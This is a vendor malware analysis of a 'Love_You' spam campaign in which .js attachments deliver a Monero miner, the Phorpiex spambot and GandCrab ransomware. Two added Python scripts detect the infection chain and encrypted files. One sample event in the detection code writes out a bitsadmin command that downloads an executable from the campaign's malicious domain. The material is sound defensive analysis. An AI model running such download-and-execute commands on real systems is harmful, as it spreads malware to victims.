Malspam, or malicious spam email, is one of the attackers' favourite channels for delivering malware to targeted victims. Attackers also run spam email campaigns to distribute their malware to a large number of users.
For attackers to succeed, two things are important: first, the email must get through the installed security product's spam filters, and second, the attachment must be opened by the user. To accomplish the second task, attackers use various tactics to make the malicious email look as attractive or legitimate as possible, in order to trick users into opening the attachment.
In earlier incidents, such spam campaigns were observed delivering the Monero (XMRig) cryptocurrency miner, the Phorpiex spambot and GandCrab ransomware through zipped '.js' attachments whose names start with "Love_You_".
How these attacks happen
The attack chain below depicts the execution sequence observed in this attack.
Fig 1: Attack chain
The targeted victim receives an email with a subject line such as "Just for You" or "Love You". The email contains an attachment whose name starts with "Love_You_".
Fig 2: Email with zip attachment.
In the above screenshot, the attached zip file contains a .js file with the same name as the zip file.
As shown in Fig 3, the highlighted command downloads the initial exe file, named with a random number, via a bitsadmin command from the malicious link "hxxp://slpsrgpsrhojifdij.ru" and drops the downloaded file in %temp%.
This random_number.exe drops a copy of itself in "C:\Windows" under the name "winsvcs.exe", which then acts as a malware downloader and downloads further exe files into %temp%, as highlighted in the Wireshark traffic snippet below.
Fig 4: Malware downloader downloads exe files.
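The dropper chain above (script host launching bitsadmin, a numeric-named exe running out of %temp%, then winsvcs.exe running from C:\Windows) is straightforward to hunt for in process-creation telemetry. The following is an added example, not tooling from the report or from Quick Heal; the event field names (pid, ppid, image, cmdline), the sample events and the placeholder URL path are assumptions modelled on Sysmon Event ID 1 style logs.

```python
"""Hunt for the .js -> bitsadmin -> %temp% -> C:\\Windows dropper chain in
process-creation telemetry. Added example, not code from the original report.
Event fields (pid, ppid, image, cmdline) and the sample events are
assumptions modelled on Sysmon Event ID 1 style logs."""
import re
from typing import Dict, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Dropped file names taken from the report.
DROPPED_NAMES = {"winsvcs.exe", "wincfg32svc.exe"}
# An executable under a Temp directory whose name is only digits (random_number.exe).
TEMP_NUMERIC_EXE = re.compile(r"\\temp\\\d+\.exe$", re.IGNORECASE)

# Constructed sample events (assumption: Sysmon-like field names; the URL path
# after the domain from the report is a placeholder).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "4100", "ppid": "3000", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\AppData\Local\Temp\Love_You_sample.js"'},
    {"pid": "4120", "ppid": "4100", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job /download /priority high "
                r"hxxp://slpsrgpsrhojifdij.ru/placeholder "
                r"C:\Users\victim\AppData\Local\Temp\3412938.exe"},
    {"pid": "4130", "ppid": "4120", "image": r"C:\Users\victim\AppData\Local\Temp\3412938.exe",
     "cmdline": r"C:\Users\victim\AppData\Local\Temp\3412938.exe"},
    {"pid": "4140", "ppid": "4130", "image": r"C:\Windows\winsvcs.exe",
     "cmdline": r"C:\Windows\winsvcs.exe"},
    # Benign: an admin-launched BITS download into a Downloads folder.
    {"pid": "5000", "ppid": "3000", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer update /download /priority normal "
                r"https://example.com/patch.msi C:\Users\victim\Downloads\patch.msi"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def bits_download_destination(cmdline: str):
    """Return the local destination of a 'bitsadmin /transfer ... /download'
    command, or None. bitsadmin takes the remote URL and the local path as the
    final two arguments, so the destination is the last token."""
    tokens = cmdline.split()
    if len(tokens) < 4 or "/download" not in (t.lower() for t in tokens):
        return None
    return tokens[-1]


def detect_chain(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply three rules derived from the observed chain and return the findings."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_image = basename(parent["image"]) if parent else ""
        # Rule 1: a script host (the .js attachment) drives bitsadmin to pull an exe into %temp%.
        if image == "bitsadmin.exe" and parent_image in SCRIPT_HOSTS:
            dest = bits_download_destination(e["cmdline"])
            if dest and TEMP_NUMERIC_EXE.search(dest):
                findings.append({"pid": e["pid"], "rule": "script_host_bitsadmin_download_to_temp"})
        # Rule 2: a numeric-named exe executes out of %temp%.
        if TEMP_NUMERIC_EXE.search(e["image"]):
            findings.append({"pid": e["pid"], "rule": "numeric_exe_from_temp"})
        # Rule 3: one of the dropped file names runs directly from C:\Windows.
        if image in DROPPED_NAMES and e["image"].lower().startswith("c:\\windows\\"):
            findings.append({"pid": e["pid"], "rule": "known_dropped_name_in_windows_dir"})
    return findings


if __name__ == "__main__":
    for finding in detect_chain(SAMPLE_EVENTS):
        print(finding)
```

Rule 1 is the one that generalises best, since it keys on the parent/child relationship and the download destination rather than on the attacker's domain; rules 2 and 3 are tied to the specific file names and naming pattern seen in this campaign and will need refreshing as the campaign changes.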
The dropped random_number.exe performs Monero (XMRig) cryptocurrency mining. The figure below shows the miner's traffic.
Fig 5: Traffic for Monero (XMRig) cryptocurrency miner
The downloader then drops another random_number.exe in %temp%, which carries the Phorpiex spambot. This random_number.exe drops "wincfg32svc.exe" into "C:\Windows"; "wincfg32svc.exe" then attempts to send spam emails from the infected host, as shown in the Procmon snapshot below.
Fig 6: Phorpiex spambot sends spam mail from the infected host.
The malware downloader then drops another random_number.exe in %temp%, the payload for GandCrab V5.0.4, which starts encrypting files on the victim's computer with AES and appends an extension of random letters to each encrypted file.
We found that it encrypts only non-PE files on the victim's machine. It drops the ransom note shown below:
Fig 7: Ransom note
Fig 8: Encrypted file pattern
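The two observations above, encrypted files renamed with a random-letter extension and PE files left untouched, give a responder a cheap way to triage a suspect host or file share for the encryption footprint. The following scanner is an added example, not the report's or Quick Heal's tooling; the sample file tree, the known-extension list and the entropy threshold are assumptions.

```python
"""Scan a directory tree for the encryption footprint described above:
non-PE files renamed with a random-letter extension whose content is
high-entropy. Added example, not the report's own tooling; the sample
tree, extension list and entropy threshold are assumptions."""
import math
import os
import shutil
import tempfile
from collections import Counter
from typing import List

# Extensions treated as legitimate; an alphabetic extension outside this set is suspicious.
KNOWN_EXTENSIONS = {"txt", "pdf", "docx", "xlsx", "jpg", "png", "exe", "dll", "bin", "zip", "js"}
ENTROPY_THRESHOLD = 7.5  # bits per byte; assumption, tune per environment
SAMPLE_SIZE = 4096       # bytes read from the head of each file


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; ciphertext sits close to 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(path: str) -> bool:
    """Heuristic: unknown random-letter extension, not a PE image, high entropy."""
    name = os.path.basename(path)
    if "." not in name:
        return False
    ext = name.rsplit(".", 1)[-1].lower()
    if not (ext.isalpha() and 4 <= len(ext) <= 10) or ext in KNOWN_EXTENSIONS:
        return False
    with open(path, "rb") as fh:
        head = fh.read(SAMPLE_SIZE)
    if head[:2] == b"MZ":  # the report says PE files are left alone
        return False
    return shannon_entropy(head) >= ENTROPY_THRESHOLD


def scan(root: str) -> List[str]:
    """Return the paths (relative to root) that match the heuristic, sorted."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            full = os.path.join(dirpath, f)
            if looks_encrypted(full):
                hits.append(os.path.relpath(full, root))
    return sorted(hits)


def build_sample_tree() -> str:
    """Constructed sample files (assumption) exercising each branch of the heuristic."""
    root = tempfile.mkdtemp(prefix="ransom_scan_")
    samples = {
        "invoice.pdf.xkqwf": os.urandom(SAMPLE_SIZE),        # encrypted-looking: flagged
        "photo.jpg": os.urandom(SAMPLE_SIZE),                # high entropy but a known extension
        "tool.qzlmv": b"MZ" + os.urandom(SAMPLE_SIZE),       # PE image: excluded by the MZ check
        "readme.txt": b"hello world\n" * 200,                # plain text
        "data.bin.pmzrt": b"A" * SAMPLE_SIZE,                # odd extension but low entropy
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)
    return root


def demo() -> List[str]:
    """Build the sample tree, scan it, and clean up."""
    root = build_sample_tree()
    try:
        return scan(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The extension check alone is not enough, since backups and temporary files also carry unusual suffixes; requiring near-random content as well keeps the false-positive rate manageable, and the MZ check mirrors the behaviour observed in this sample. Against a real share, pass the share path to scan() and treat a large number of hits under one directory as the signal.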
Quick Heal proactively protects its users from this threat:
Fig 9: Email protection.
Fig 10: Behavior Detection
Fig 11: Anti Ransomware
How to stay safe from ransomware attacks
Indicators of compromise: (SHA256)
Monero (XMRig) cryptocurrency miner:
Subject Matter Experts:
Priyanka Dhasade, Manish Patil | Quick Heal Security Labs